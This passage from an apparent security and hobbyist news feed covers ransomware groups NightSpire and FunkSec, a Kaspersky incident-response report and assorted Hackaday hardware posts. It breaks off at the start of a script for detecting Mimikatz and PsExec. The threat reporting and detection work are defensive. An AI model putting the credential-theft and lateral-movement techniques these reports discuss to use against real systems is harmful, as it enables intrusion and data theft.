This rhetoric is a clear signal of cyber-intimidation, aimed at reinforcing the group's image as an unstoppable threat and at destabilizing victims.

Analysis of the Data Leak Site (DLS)


NightSpire uses a data leak site to publish information on compromised companies, a modus operandi that is now common among ransomware groups. The portal has a “Databases” section listing the victims, with details on:

  • Date of the attack
  • Date of publication of the leak
  • Size of the exfiltrated data
  • Victim's country

From the images analyzed, some affected companies can be seen:

Some of these leaks are still counting down, suggesting that the group follows a double extortion strategy: threatening to publish the stolen data if the ransom is not paid. When the timer reaches zero, the data is made public.

This technique is used to put further pressure on victims, pushing them to pay in order to avoid reputational damage and the loss of sensitive data.

Contact Structure and Telegram Channel


NightSpire offers several contact methods through its dedicated page. In addition to the usual email addresses on ProtonMail and OnionMail, they also have a Telegram channel, often used by ransomware groups to communicate leak updates, negotiate ransoms and give instructions to victims.

Identified contact methods:


  • Email
  • Contact Form
  • Telegram

The Telegram channel is probably used to announce new attacks, interact with victims and manage communications with potential affiliates or data sellers.

Characterization of the Group


Although detailed information on their origin or attack techniques is not yet available, some elements suggest that NightSpire may be an emerging group strongly influenced by existing RaaS (Ransomware-as-a-Service) models.

Possible operational characteristics:

  • Use of double extortion
  • DLS portal with a countdown timer for data release
  • Telegram channel for communications
  • Targeting of companies across different global regions
  • Aesthetics and communication similar to advanced ransomware groups

Whether this is a new independent group or a rebrand of an existing actor remains to be determined.

Conclusions and Final Considerations


NightSpire presents itself as a new threat in the ransomware landscape. The absence of references to pre-existing groups makes it difficult to draw a direct line to known actors, but their modus operandi is clearly inspired by proven techniques.

Companies must adopt cyber resilience strategies, strengthening endpoint protection, implementing incident response plans and improving staff training to mitigate the risk of compromise.

We will continue to monitor NightSpire to identify their tactics and operating procedures, assessing their impact on global cybercrime.

The article NightSpire Arrives! A New Actor in the Ransomware Landscape originally appeared on Red Hot Cyber, the information security blog.


Meshtastic Adds Wireless Connectivity to Possum Trap


Perhaps every gardener who has attempted to grow a tomato, lettuce, or bean has had to contend with animals trying to enjoy the food before the gardener can, whether it’s a groundhog, rabbit, mouse, crow, or even iguana. There are numerous ways to discourage these mischievous animals from foraging the garden beds, including traps, but these devices have their downsides as well. False alarms can be a problem, as can trapping animals that will be overly aggravated to be inside the trap (like skunks). While the latter problem can’t easily be solved by technology, the former can, with the help of Meshtastic.

[Norman Jester]’s problem was an errant possum, but these nocturnal animals generally come out while humans are asleep, and other nighttime animals like rats can activate the trap and then escape. To help with this, a Meshtastic node was added to the San Diego mesh using a 3.5mm audio jack as a detector. When the trap is activated, the closing door yanks a plug out of the jack, alerting the node that the trap has been closed. If it’s a false alarm the trap can be easily and quickly reset, and if a possum has found its way in then it can be transported to a more suitable home the next day.

It’s worth noting that American possums (distinct from the Australian animals of the same name) are an often-misunderstood animal that generally do more good than harm. They help to control Lyme disease, eat a lot of waste that other animals won’t, don’t spread rabies, and don’t cause nearly as much disruption to human life as other animals like feral cats or raccoons. But if one is upsetting a garden or another type of animal is causing a disturbance, this Meshtastic solution does help solve some of the problems with live traps. For smaller animals, though, take a look at this Arduino-powered trap instead.

Thanks to [Dadsrcworkbench] for the tip!



hackaday.com/2025/03/12/meshta…


A Fast Rewind to the Era of Tapesponding


Newspaper clipping with words 'speaking personally' and a photo

Imagine a time before Discord servers and cheap long-distance calls. Back in the 1950s, a curious and crafty group of enthusiasts invented their own global social network: on reels of magnetic tape. They called it tapesponding (short for tape corresponding), and it was a booming hobby for thousands of radio hams, tinkerers, and audio geeks. Here’s the original video on this analog marvel.

These folks weren’t just swapping mixtapes. They crafted personal audio letters, beamed across the globe on 3-inch reels. DIY clubs emerged everywhere: World Tape Pals (Texas-based, naturally) clocked 5,000 members from “every Free Nation” – which frames the hobby in the East-versus-West terms of its era. Some groups even pooled funds to buy shared tape decks in poorer regions – pure hacker spirit. The tech behind it: speeds of 3¾ IPS, half-track mono, round-robin reels, and rigorous trust networks to avoid ghosters. Honestly, it makes IRC net ops look soft. Tapesponding wasn’t just for chatty types. It fostered deep friendships, even marriages. It was social engineering before that term was coined. The video is below the break.

What are your thoughts on this nostalgic way of long-distance communication? The warm whirring of a spinning tape reel? The waiting time before your echo is returned? Or have you skipped all the analog mechanics and shouted out into the LoRaWAN void long ago?



hackaday.com/2025/03/12/a-fast…


EPROM-based Enigma Machine


The Enigma machine is perhaps one of the most legendary devices to come out of World War II. The Germans used the ingenious cryptographic device to hide their communications from the Allies, who in turn spent an incredible amount of time and energy in finding a way to break it. While the original Enigma was a complicated electromechanical contraption, [DrMattRegan] recently set out to show how its operation can be replicated with an EPROM.

The German Enigma machine was, for the time, an extremely robust way of coding messages. Earlier versions proved somewhat easy to crack, but subsequent machines added more and more complexity rendering them almost impenetrable. The basis of the system was a set of rotors which encrypted each typed letter to a different one based on the settings and then advanced one place in their rotation, ensuring each letter was encrypted differently than the last. Essentially this is a finite-state machine, something perfectly suited for an EPROM. With all of the possible combinations programmed in advance, an initial rotor setting can be inputted, and then each key press is sent through the Enigma emulator which encrypts the letter, virtually advances the rotors, and then moves to the next letter with each clock cycle.
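As an added illustration (not [DrMattRegan]’s code), here is a small Python model of the Enigma I as exactly the finite-state machine described above: the rotor positions are the state, each keypress is a table lookup for that state followed by a rotor advance, and one function returns the 26-entry table an EPROM would hold for a given state. The rotor wirings are the historical Enigma I rotors I, II, III with reflector B; ring settings and the plugboard are omitted, which is an assumption of this model.

```python
# Added example: a minimal Enigma I model as a finite-state machine.
# State = rotor positions; each keypress maps one letter through the table
# for the current state and then advances the rotors (an EPROM holds the
# tables, a counter/latch holds the state). Ring settings and plugboard
# are omitted in this model (assumption).
from string import ascii_uppercase as ALPHA

# Historical Enigma I wirings (rotors I, II, III) and reflector B.
ROTORS = {
    "I":   ("EKMFLGDQVZNTOWYHXUSPAIBRCJ", "Q"),  # (wiring, turnover notch)
    "II":  ("AJDKSIRUXBLHWTMCQGZNPYFVOE", "E"),
    "III": ("BDFHJLCPRTXVZNYEIWGAKMUSQO", "V"),
}
REFLECTOR_B = "YRUHQSLDPXNGOKMIEBFZCWVJAT"


class Enigma:
    def __init__(self, rotor_names=("I", "II", "III"), positions="AAA"):
        # Rotors and positions are listed left to right, as in the windows.
        self.wirings = [ROTORS[n][0] for n in rotor_names]
        self.notches = [ALPHA.index(ROTORS[n][1]) for n in rotor_names]
        self.pos = [ALPHA.index(c) for c in positions]

    def state(self):
        """Current window letters, i.e. the machine's state."""
        return "".join(ALPHA[p] for p in self.pos)

    def step(self):
        """Advance rotors before a keypress, including the double-step."""
        left, mid, right = 0, 1, 2
        if self.pos[mid] == self.notches[mid]:
            # Middle rotor at its notch: it and the left rotor both move.
            self.pos[mid] = (self.pos[mid] + 1) % 26
            self.pos[left] = (self.pos[left] + 1) % 26
        elif self.pos[right] == self.notches[right]:
            self.pos[mid] = (self.pos[mid] + 1) % 26
        self.pos[right] = (self.pos[right] + 1) % 26

    def _through(self, c, idx, inverse):
        """Pass contact index c through rotor idx at its current offset."""
        w, p = self.wirings[idx], self.pos[idx]
        if not inverse:
            return (ALPHA.index(w[(c + p) % 26]) - p) % 26
        return (w.index(ALPHA[(c + p) % 26]) - p) % 26

    def lookup(self, letter):
        """Pure table lookup for the current state (no stepping)."""
        c = ALPHA.index(letter)
        for idx in (2, 1, 0):            # right to left into the reflector
            c = self._through(c, idx, inverse=False)
        c = ALPHA.index(REFLECTOR_B[c])
        for idx in (0, 1, 2):            # back out, left to right
            c = self._through(c, idx, inverse=True)
        return ALPHA[c]

    def press(self, letter):
        """One keypress: advance the state, then map the letter."""
        self.step()
        return self.lookup(letter)

    def run(self, text):
        return "".join(self.press(ch) for ch in text if ch in ALPHA)


def eprom_table(machine):
    """The 26-entry substitution an EPROM would store for one rotor state."""
    return {ch: machine.lookup(ch) for ch in ALPHA}


if __name__ == "__main__":
    print(Enigma(positions="AAA").run("AAAAA"))   # BDZGO for these settings
    print(Enigma(positions="AAA").run("BDZGO"))   # AAAAA: the machine is reciprocal
```

Because the reflector makes every per-state table an involution, running the ciphertext through a machine in the same starting state recovers the plaintext; the double-step is visible by starting at window "ADV" and stepping twice.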

[DrMattRegan]’s video, also linked below, goes into much more historical and technical detail on how these machines worked, as well as some background on the British bombe, an electromechanical device used for decoding encrypted German messages. The first programmable, electronic, digital computer, called Colossus, was also developed to break encrypted Enigma messages, demonstrating yet another technology that came to the forefront during WWII.


Thanks to [Clint] for the tip!


hackaday.com/2025/03/12/eprom-…


FLOSS Weekly Episode 824: Gratuitous Navel Gazing


This week, Jonathan Bennett chats with Doc Searls about SCaLE and Personal AI! What’s the vision of an AI that consumers run themselves, what form factor might that take, and how do we get there?



Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.


Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)

Licensed under Creative Commons: By Attribution 4.0 License


hackaday.com/2025/03/12/floss-…


FlyingCam is a Sweet DIY Webcam on a Stick


Imagine you want to monitor a pot on the stove to see if it’s boiling over for just a few minutes, but you don’t want to have a dedicated permanent IP webcam solution in your kitchen. [Sebastian Duell]’s FlyingCam hijacks an IKEA lamp gooseneck to become something you never knew you needed: a wireless camera for short-term random remote observation. It’s a beautiful combination of 3D printing and commercial device re-use, and when paired with his DIY wireless screen, it’s a complete solution.

The guts of this project aren’t critical, or expensive. It’s built around one of those ESP32 single-board webcams, with an added fan, battery pack, antenna, and a power switch. You turn it on, and the AP in the ESP32 fires up, or optionally connects to your network. Point the camera at your target and you’re set, at least if you want to sit by your computer. But [Sebastian] also designed a nice simple remote screen, so you can keep tabs on your spaghetti wherever you roam around the house.

We love the attention to keeping the design simple here, both in form and in function. It’s a one-task device, so it’s important that it be extremely easy to use, and it’s hard to beat just pointing the thing and turning on a switch. And it doesn’t hurt that it’s good looking to boot.

IKEA stuff is cheap and cheerful, but often it’s missing just that one functionality that we want. What good is an air-quality sensor without MQTT logging capability, for instance? Or a standing desk that can’t remember set heights? Get hacking!


hackaday.com/2025/03/12/flying…


Pixel Watch 3’s Loss of Pulse Detection: the Algorithms That Tell Someone is Dying


More and more of the ‘smart’ gadgets like watches and phones that we carry around with us these days come with features that we’d not care to ever need. Since these are devices that we strap onto our wrists and generally carry in close proximity to our bodies, they can use their sensors to make an estimation of whether said body is possibly in the process of expiring. This can be due to a severe kinetic event like a car crash, or something more subtle like the cessation of the beating of one’s heart.

There is a fairly new Loss of Pulse Detection (LoPD) feature in Google’s Pixel Watch 3 that recently got US FDA approval, allowing it to be made available in the US after previously becoming available in over a dozen European countries following its announcement in August of 2024. This opt-in feature regularly polls whether it can detect the user’s pulse. If not found, it cascades down a few steps before calling emergency services.

The pertinent question here is always whether it is truly detecting a crisis event, as nobody wants to regularly apologize for a false alert to the overworked person staffing the 911 or equivalent emergency line. So how do you reliably determine that your smart watch or phone should dial emergencies forthwith?

Budget Medical Devices


One of the amazing things about technological progress is that sensors and processing capabilities that were rather exotic a few decades ago are now being included in just about any smart device you can strap on your wrist. This includes motion sensors, pulse- and oxygen level meters, making these devices in theory capable of acting like ambulatory cardiac monitors and similar medical devices that monitor health parameters and respond to emergencies.

While for a long time the gold standard for monitoring heart function over a longer period outside a hospital setting was a portable electrocardiogram (ECG) recorder, wrist-worn monitoring devices based on photoplethysmography (PPG) have recently proven themselves to be acceptable substitutes. In a 2018 study by Francesco Sartor et al. in BMC Sports Science, Medicine and Rehabilitation, the researchers found that the wrist-worn PPG was not as accurate as the ECG-based chest strap monitor, but came close enough to be practical.

The difference is such that for applications where precision actually matters the chest strap ECG is still the optimal choice, but wrist-worn PPG devices as integrated into many fitness bands and smart watches are an acceptable substitute, such as when monitoring heart rate for signs of atrial fibrillation. A 2022 study by Christopher Ford et al. in JACC: Clinical Electrophysiology examined two smart watches (Apple Watch 4, KardiaBand) for this purpose, finding that their accuracy here was 91% and 87% respectively.

Together with additional sensors like the commonly integrated motion sensor, these devices seem accurate enough to at least determine whether the person wearing them is suffering a cardiac event that requires immediate intervention.

Health Check


The idea of an automatic emergency call isn’t new, with for example the EU making such a system (called eCall) mandatory in new cars since 2018. The idea is that when a serious collision is detected, emergency services are contacted and provided with location and sensor data. Google added its Car Crash Detection feature to the Pixel 3 smartphone in 2019, and Apple added Crash Detection to its Apple Watch and iPhones in 2022. These use sensor data from gyroscopes, GPS, microphones, and accelerometers to determine whether a crash just occurred.

What users of these devices discovered, however, was that activities such as going on a rollercoaster ride could activate this feature, as could snowmobile rides, skiing, and similar activities. In response, Apple had to adjust its algorithms on these devices to reduce the number of false positives. Despite this, rescue workers in e.g. Canada are still reporting a large number of false positives. One reason cited is that although there’s a time-out, accompanied by an audible alarm, before the emergency line is called, this can be hard to hear when you’re on a snowmobile.

As it turns out, defining what seems like a pretty clear event to us when you’re limited to just this handful of sensors is much trickier than it seems. After all, what is different between the sensor data from a rollercoaster ride, a car crash, dropping one’s phone or smart watch onto a concrete floor or forgetting said phone on the roof of the car?

In this context, the idea of taking a simple activity like measuring heart rate and pulse, and extrapolating from these that if they cease, an emergency has occurred is fraught with pitfalls as well.

Merging Data


How do you know as a human being that someone has just suffered cardiac arrest? You confirm that they don’t have a noticeable (carotid) pulse, and the reason why you checked is because they clearly collapsed. This is when you’d pull out your phone and dial emergency services. The LoPD feature that Google has introduced has to do effectively exactly these steps, except that it starts from the loss of pulse (LoP) rather than from seeing someone pass out and collapse to the ground.

Thus the tricky part is establishing whether said collapsing has occurred, not whether the pulse has been lost. After all, the user may have simply taken the watch off. According to Google, to verify their algorithms they hired stunt actors to simulate LoP using a tourniquet (cutting off blood flow) and simulating falls like a person suffering cardiac arrest would suffer.

On the sensor side they use the heart rate monitor (PPG sensor), which initially uses the green light to check for a pulse, but can switch to infrared and red light when a LoP condition is triggered. Simultaneously the motion sensor data is consulted, with a lack of motion taken as a sign that this is a genuine LoP event. This starts an auditory alarm and a visual countdown on the screen before emergency services are contacted with an automated message plus the user’s location.

The response to this merged sensor data was calibrated against clinical data on e.g. cardiological events before trialing the result with said stunt actors and volunteers. An article on this research was also published in Nature (paywalled, gift article), detailing the algorithm and the way they tested its effectiveness. In the paper the authors note one false positive event and subsequent emergency call across 21.67 user-years across two studies, with a sensitivity of 67.23%.
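To make the cascade concrete, here is an added toy model (not Google’s algorithm or code) of the stages described above, run over constructed sensor samples: green-light PPG polling, escalation to IR/red PPG plus a motion check, an alarm with a cancellable countdown, and only then the call. The sample cadence, the 20-second countdown, the stillness threshold and the cancel-on-motion rule are assumptions of this model, chosen to show the false-positive paths (watch removed, pulse found on the second wavelength, wearer cancels) alongside the unwitnessed-arrest path.

```python
# Added example: a simplified loss-of-pulse detection cascade.
# Constructed sensor samples drive a small state machine; thresholds,
# timings and the cancel rules are assumptions, not the product's values.
from dataclasses import dataclass
from enum import Enum, auto


class State(Enum):
    MONITORING = auto()   # green-light PPG polled regularly
    CONFIRMING = auto()   # no pulse on green: consult IR/red PPG and motion
    COUNTDOWN = auto()    # audible alarm + on-screen countdown, cancellable
    CALLING = auto()      # automated message + location to emergency services
    IDLE = auto()         # watch not on the wrist


@dataclass
class Sample:
    t: int                 # seconds since start (constructed)
    green_pulse: bool      # pulse detected with green PPG
    ir_red_pulse: bool     # pulse detected with IR/red PPG
    motion: float          # accelerometer magnitude, arbitrary units
    on_wrist: bool = True  # wear detection
    user_cancel: bool = False  # wearer dismissed the alarm


MOTION_STILL = 0.05   # below this the wearer is treated as motionless (assumption)
COUNTDOWN_S = 20      # alarm duration before the call is placed (assumption)


def run_cascade(samples, countdown_s=COUNTDOWN_S):
    """Return (final_state, events) for a time-ordered list of samples."""
    state, deadline, events = State.MONITORING, None, []
    for s in samples:
        if not s.on_wrist:
            # Taking the watch off is not a loss of pulse: drop everything.
            state, deadline = State.IDLE, None
            continue
        if state == State.IDLE:
            state = State.MONITORING

        if state == State.MONITORING:
            if not s.green_pulse:
                state = State.CONFIRMING
        elif state == State.CONFIRMING:
            if s.ir_red_pulse or s.motion > MOTION_STILL:
                state = State.MONITORING   # pulse on IR/red or wearer moving
            else:
                state, deadline = State.COUNTDOWN, s.t + countdown_s
                events.append(("alarm", s.t))
        elif state == State.COUNTDOWN:
            if s.user_cancel or s.ir_red_pulse or s.motion > MOTION_STILL:
                state, deadline = State.MONITORING, None
                events.append(("cancelled", s.t))
            elif s.t >= deadline:
                state = State.CALLING
                events.append(("call", s.t))
        # State.CALLING is terminal for this simulation.
    return state, events


# Constructed scenarios, one sample every 10 s.
_OK = [Sample(0, True, True, 0.3), Sample(10, True, True, 0.2)]
SCENARIOS = {
    "unwitnessed_arrest": _OK + [
        Sample(t, False, False, 0.0) for t in (20, 30, 40, 50)],
    "watch_removed": _OK + [
        Sample(t, False, False, 0.0, on_wrist=False) for t in (20, 30, 40)],
    "wearer_cancels": _OK + [
        Sample(20, False, False, 0.0), Sample(30, False, False, 0.0),
        Sample(40, False, False, 0.0, user_cancel=True)],
    "poor_contact": _OK + [
        Sample(20, False, True, 0.0), Sample(30, False, True, 0.0)],
}


if __name__ == "__main__":
    for name, samples in SCENARIOS.items():
        print(name, run_cascade(samples))
```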

A Matter Of Time

Chain of survival in case of cardiac arrest. (Credit: European Resuscitation Council)

In the case of cardiac arrest, time is of the absolute essence. This is also clearly noted in the Google paper on the LoPD feature, which notes that ideally there is a witness on-site who can immediately begin CPR or (ideally) fetch a nearby automated external defibrillator (AED). Unfortunately, in most cases of cardiac arrest the event initially goes unnoticed. The LoPD feature on a smart watch would thus be for cases where nobody is around to notice the emergency and respond to it. Although it isn’t explicitly mentioned, it seems that the watch can also detect whether it’s being worn or not, which should prevent false positives there.

With each year over half a million US citizens alone suffering cardiac arrest and over half of these occurring outside of a hospital setting, this could potentially save thousands of lives each year. Following cardiac arrest and in the absence of resuscitation the lack of blood (and oxygen) being circulated means that within minutes organs begin to suffer the harmful effects, depending on their oxygen requirements. The brain is generally the first to suffer ill effects, which is why the application of CPR is so crucial.

Because of the intense urgency following a major cardiac event like this, the practical use of this LoPD feature will be highly dependent on the location where the emergency occurs. In the case of e.g. someone collapsing while alone at home in their city house or apartment, this could conceivably save their life if emergency services can arrive within minutes. Even faster and more useful in less urban settings would probably be having your smart device notify nearby people who can then perform CPR while calling 911 or equivalent.

That said, perhaps the real killer feature that’s missing here is an integrated AED in smartphones since everyone has one of those things on them at all times, or even smart watches that can automatically perform defibrillation while also notifying emergency services.


hackaday.com/2025/03/12/pixel-…


FUNKSEC Claims a Cyber Attack on the University of Modena and Reggio Emilia. Find Out the Details


Today, the FUNKSEC cybercriminal gang claimed on its Data Leak Site (DLS) a cyber attack on the Italian University of Modena and Reggio Emilia. In the post published on their blog on the clear web (and in the underground), the cybercriminals report that the gang is in possession of 1GB of data exfiltrated from the organization’s IT infrastructure. They threaten to publish it in 7 days and 11 hours.

At the moment, we cannot confirm the veracity of the news, since the organization has not yet released any official press statement on its website regarding the incident. This article should therefore be considered an ‘intelligence source’.

To prove that access to the IT infrastructure was successful, the cybercriminals post a series of documents (samples) belonging to the organization.

This way of operating – as RHC readers know – generally occurs when an agreement on paying the ransom demanded by the cybercriminals has not yet been reached. In this way, by threatening to publish the data in their possession, the criminals increase the pressure on the breached organization, hoping that payment will come faster.

Note that this cybergang, unlike the others, has a website exposed on the internet, so it is accessible on the clear web to anyone and indexable by search engines.

Since (as we will see later) FUNKSEC has often recycled information from previous data leaks or hacktivist activity, it remains to be seen how well-founded this claim is, and it must therefore be considered as “intelligence information”.

As is our custom, we always leave room for a statement from the organization should it wish to give us updates on the matter. We will be happy to publish such information in a dedicated article giving prominence to the issue.

RHC will monitor the evolution of the matter in order to publish further news on the blog should there be substantial developments. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower’s encrypted email.

The Funk Sec cybergang


The FunkSec ransomware group first emerged publicly at the end of 2024 (as CheckPoint researchers report) and quickly gained notoriety by publishing over 85 claimed victims, more than any other ransomware group in the month of December alone. Presenting itself as a new Ransomware-as-a-Service (RaaS) operation, FunkSec appears to have no known connections to previously identified ransomware gangs, and little information is currently available about its origins or operations.

The group’s activity indicates that the impressive numbers of published victims may mask a more modest reality, both in terms of actual victims and in terms of the group’s skill level. Most of FunkSec’s core operations are probably conducted by inexperienced actors. Moreover, it is difficult to verify the authenticity of the leaked information, since the group’s main goal seems to be gaining visibility and recognition. Evidence suggests that in some cases the leaked information was recycled from previous leaks related to hacktivist activity, raising doubts about its authenticity.

FunkSec has links to the hacktivist world and uses public tools, including a custom ransomware probably developed by a relatively inexperienced malware author based in Algeria. The findings indicate that the development of the group’s tools, including the ransomware, was probably assisted by artificial intelligence, which may have contributed to their rapid iteration despite the author’s apparent lack of technical expertise.

This case highlights the increasingly blurred line between hacktivism and cybercrime, underlining the challenges in distinguishing one from the other. Whether such a distinction really exists, or whether the operators are aware of it or interested in defining it, remains uncertain. More importantly, it also calls into question the reliability of current methods for assessing the risk posed by ransomware groups, especially when those assessments rely on the public claims of the actors themselves.

The University of Modena and Reggio Emilia


Since its origins dating back to 1175, the University has been the hub of scientific, cultural and social life and, albeit with mixed fortunes tied to the local political changes that followed one another over the centuries, it has progressively expanded to become a multidisciplinary, active and dynamic university.

With around 30,000 students enrolled in first-, second- and third-cycle degree programs and over 1,400 employees among teaching, research and technical-administrative staff, Unimore is among the large universities; it is organized as a network of campuses (Modena and Reggio Emilia) and consists of 13 Departments and 2 Faculties/Schools, joined by the cities of Mantova and Carpi (accredited degree-program sites), as well as interdepartmental centers located across the two provinces of Modena and Reggio Emilia, where teaching, research, third-mission activities and the related support and technology-transfer services take place.

What is ransomware as a service (RaaS)


Ransomware is a type of malware that is injected into an organization to encrypt data and make systems unavailable. Once the data is encrypted, the criminals demand that the victim pay a ransom, in cryptocurrency, to decrypt it.

If the victim does not want to pay the ransom, the criminals proceed with double extortion, i.e. the threat to publish sensitive data previously exfiltrated from the victim’s IT infrastructure.

To better understand how criminal organizations operate within the ransomware as a service (RaaS) business, we refer you to these articles:


How to protect yourself from ransomware


Ransomware infections can be devastating for an organization, and data recovery can be a difficult and laborious process that requires highly specialized operators for reliable recovery; in the absence of a data backup, recovery has very often been unsuccessful.

Users and administrators are therefore advised to adopt preventive security measures to protect their networks from ransomware infections; in order of complexity, these are:

  • Train staff through awareness courses;
  • Use a data backup and recovery plan for all critical information. Perform and test regular backups to limit the impact of data or system loss and to speed up the recovery process. Keep in mind that even network-connected backups can be affected by ransomware. Critical backups must be isolated from the network for optimal protection;
  • Keep the operating system and all software up to date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Ensuring that these are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker;
  • Keep antivirus software up to date and scan all software downloaded from the Internet before running it;
  • Limit users’ ability (permissions) to install and run unwanted software applications, and apply the principle of “least privilege” to all systems and services. Limiting these privileges can prevent malware from running or limit its ability to spread across the network;
  • Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, the embedded code will run the malware on the computer;
  • Do not follow unsolicited web links in emails;
  • Never expose Remote Desktop Protocol (RDP) connections directly to the internet. If access from the internet is required, it must be mediated by a VPN;
  • Implement Intrusion Prevention System (IPS) and Web Application Firewall (WAF) solutions as perimeter protection in front of internet-exposed services;
  • Implement a natively automated XDR security platform, ideally backed by a 24/7 MDR service, achieving complete and effective protection and visibility across endpoints, users, networks and applications regardless of resources, team size or skills, and providing automated detection, correlation, analysis and response.

Both individuals and organizations are discouraged from paying the ransom, since even after payment the cyber gangs may not release the decryption key, or the recovery operations may suffer errors and inconsistencies.

Cybersecurity is a serious matter and today can deeply undermine a company’s business.

Today it is necessary to change mindset immediately and think of cybersecurity as an integral part of the business, rather than thinking about it only after a cybersecurity incident has occurred.

The article FUNKSEC Claims a Cyber Attack on the University of Modena and Reggio Emilia. Find Out the Details comes from il blog della sicurezza informatica.


Some Useful Notes On The 6805-EC10 Addressable RGB LED


LEDs are getting smaller and smaller, and the newest generations of addressable RGB LEDs are even fiddlier to use than their already diminutive predecessors. [Alex Lorman] has written some notes about the minuscule SK6805-EC10 series of LEDs, which may be helpful to those wanting to learn how to deal with these in a more controlled manner.

Most hardware types will be very familiar with the 5050-sized devices, sold as Neopixels in some circles, which are so-named due to being physically 5.0 mm x 5.0 mm in the horizontal dimensions. Many LEDs are specified by this simple width by depth manner. As for addressable RGB LEDs (although not all addressable LEDs are RGB, there are many weird and wonderful combinations out there!) the next most common standard size down the scale is the 2020, also known as the ‘Dotstar.’ These are small enough to present a real soldering challenge, and getting a good placement result needs some real skills.

[Alex] wanted to use the even smaller EC10 or 1111 devices, which measure a staggering 1.1 mm x 1.1 mm! Adafruit’s product page mentions that these are not intended for hand soldering, but we bet you want to try! Anyway, [Alex] has created a KiCAD footprint and a handy test PCB for characterizing and getting used to handling these little suckers, which may help someone on their way. They note that hot air reflow soldering needs low temperature paste (this scribe recommends using MG Chemicals branded T3 Sn42Bi57Ag1 paste in this application) and a very low heat to avoid cracking the cases open. A low air flow rate, to prevent blowing them all over the desk, would also be smart. Perhaps these are more suited to a hot plate or a proper convection oven?

As a bonus, [Alex] has previously worked with the slightly larger SK6805-1515 device, with some good extra notes around an interesting nonlinearity effect and the required gamma correction to get good colour perception. We’ll leave that to you readers to dig into. Happy soldering!

We’ve not yet seen many projects using these 1111 LEDs, but here’s one we dug up using the larger 1515 unit.


hackaday.com/2025/03/12/some-u…


I2C Sniffing Comes to the Bus Pirate 5


While the Bus Pirate 5 is an impressive piece of hardware, the software is arguably where the project really shines. Creator [Ian Lesnet] and several members of the community are constantly working to add new features and capabilities to the hardware hacking multi-tool, to the point that if your firmware is more than a few days old there’s an excellent chance there’s a fresher build available for you to try out.

One of the biggest additions from the last week or so of development has been the I2C sniffer — a valuable tool for troubleshooting or reverse engineering devices using the popular communications protocol. [Ian] has posted a brief demo video of it in action.

It’s actually a capability that was available in the “classic” versions of the Bus Pirate, but rather than porting the feature over from the old firmware, [Ian] decided to fold the MIT licensed pico_i2c_sniffer from [Juan Schiavoni] into the new codebase. Thanks to the RP2040’s PIO, the sniffer works at up to 500 kHz, significantly outperforming its predecessor.

Admittedly, I2C sniffing isn’t anything you couldn’t do with a cheap logic analyzer. But that means dealing with captures and making sure the protocol decoder is set up properly, among other bits of software tedium. In comparison, once you start the sniffer program on the Bus Pirate 5, I2C data will be dumped out to the terminal in real-time for as long as you care to see it. For reverse engineering, it’s also very easy to move quickly from sniffing I2C packets to replaying or modifying them within the Bus Pirate’s interface.

If you already have a Bus Pirate 5, all you need to do is flash the latest firmware from the automated build system, and get sniffing. On the fence about picking one up? Perhaps our hands-on review will help change your mind.


hackaday.com/2025/03/12/i2c-sn…


Incident response analyst report 2024


Kaspersky provides rapid and fully informed incident response services to organizations, ensuring impact analysis and effective remediation. Our annual report shares anonymized data about the investigations carried out by the Kaspersky Global Emergency Response Team (GERT), as well as statistics and trends in targeted attacks, ransomware and adversaries’ tools that our experts observed throughout the year in real-life incidents that required both comprehensive IR unit support and consulting services aimed at assisting organizations’ in-house expert teams.

Download the full version of the report.

Regions and industries of incident response requests


In 2024, we saw the share of incident response requests rise in most of the regions, with the majority of investigations conducted in the CIS (50.6%), the Middle East (15.7%) and Europe (10.8%).

Geographic distribution of incident response requests, 2024

The distribution of IR requests by industry followed the 2023 pattern, keeping industrial (23.5%), government (16.3%) and financial (13.3%) organizations in the top three most targeted industries. However, this year, the majority of requests came from industrial enterprises, whereas the government agencies were targeted less often than in 2023. We also observe a growing tendency in incidents related to the transportation industry — the number of requests for IR services has doubled since 2023.

Distribution of organizations that requested IR assistance, by industry, 2024

Key 2024 trends and statistics


In 2024, ransomware accounted for 41.6% of all incidents, up 8.3 percentage points from 2023. Our GERT experts expect ransomware to remain the main threat to organizations worldwide in the coming year, continuing the trend of recent years in which it has consistently held the top positions among incidents. In the majority of infections we encountered samples of the LockBit family (43.6%), followed by Babuk (9.1%) and Phobos (5.5%). Our investigations also revealed new ransomware families such as ShrinkLocker and Ymir. In addition, GERT experts uncovered noteworthy malicious campaigns such as Tusk, and a cluster of incidents in which CVE-2023-48788 (an SQL injection vulnerability in Fortinet FortiClient EMS) was exploited.

Another alarming trend identified in real incident response cases is the wider use of tools such as Mimikatz (21.8%) and PsExec (20.0%), which are commonly used during post-exploitation for credential extraction and lateral movement. We also observe data leakage strengthening its position as the second most common reason for an incident response request, accounting for 16.9% of all incidents, which correlates with our assumptions about trends in credential access techniques.

Recommendations for preventing incidents


To protect your organization against cyberthreats and minimize the damage in the case of an attack, Kaspersky GERT experts recommend:

  • Implementing a strong password policy and using multi-factor authentication
  • Removing management ports from public access
  • Adopting secure development practices to prevent insecure code from reaching production environments
  • Establishing a zero-tolerance policy for patch management, or putting compensating controls in place for public-facing applications
  • Ensuring that employees maintain a high level of security awareness
  • Implementing rules to detect utilities commonly used by adversaries
  • Conducting frequent, regular compromise assessment activities
  • Employing a security tool set that includes EDR-like telemetry
  • Constantly testing the security operations team’s response times with simulated attacks
  • Prohibiting on the corporate network any software that is known to be abused by attackers
  • Regularly backing up your data
  • Working with an Incident Response Retainer partner to address incidents with fast SLAs
  • Implementing strict security programs for applications that handle personal information
  • Enforcing access control over important data, backed by DLP
  • Continuously training your incident response team to maintain their expertise and stay up-to-date with the evolving threat landscape
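The Mimikatz/PsExec figures above and the recommendation to "implement rules to detect utilities commonly used by adversaries" both point at the same concrete task: matching those tools in process-creation and service-install telemetry even when the attacker has renamed the binary. What follows is an added example, not Kaspersky's or GERT's own detection content. The log lines are constructed here in a Sysmon-like key=value form (Event ID 1 = process creation, Event ID 7045 = service installed) purely to exercise the rules; the field names mirror Sysmon's, but the format is an assumption, not a real export.

```python
"""Detecting PsExec and Mimikatz in process/service telemetry.

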